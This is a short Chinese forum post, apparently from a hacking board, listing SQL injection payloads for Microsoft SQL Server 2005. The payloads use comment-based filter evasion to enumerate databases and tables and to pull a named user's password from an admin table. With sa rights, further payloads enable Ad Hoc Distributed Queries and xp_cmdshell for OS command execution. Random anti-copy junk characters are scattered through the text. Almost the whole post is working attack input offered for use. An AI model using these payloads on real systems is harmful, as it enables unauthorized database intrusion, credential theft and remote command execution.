MSsql2005注入语句

admin

& Y4 {  I0 |/ w

[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
- j9 j/ K8 j) q
爆表语句,somedb部份是所要列的数据库，红色数字1累加


5 l1 k+ q8 b$ g4 Q" A[Copy to clipboard]CODE:
- [) s, V1 ~. O. x0 v& `6 [/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
8 a" n. T# ^9 n1 a
" a* H% }2 B$ u& V爆字段语句，爆表admin里user='icerover'的密码段

6 p9 k' d6 T' a/ w
% D8 Z& |( ^( l% a1 M$ I9 Q[Copy to clipboard]CODE:
" A8 q- B& ]3 Z% v; \! p. `**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

! x: M) [% ^5 S% q& tmssql2005默认没有开xp_cmdshell的，openrowset也不能用
* k4 W  E0 {- C如果是sa权限，可以这样来开启
* z) a8 U) f  G4 ?2 ~, S( N开启openrowset
2 ]( C+ k5 M0 P

3 S* I( M% K0 K/ X4 W' g[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
* I. s1 k, K4 z' u0 c8 Z0 A& Y8 y7 i/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
4 C" H" z! Z; y- e/ C; n3 O
% @6 E$ I; H. ]& x9 q/ ]# O开启xp_cmdshell


[Copy to clipboard]CODE:
4 _; z+ G1 K. `+ M6 I) REXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
: ~* X2 Z! o+ m9 W. qEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

* I, V: r( Y" z! h1 I' r, Z5 jok,over~~晚安
$ d9 |5 }: B& l+ G8 Y5 V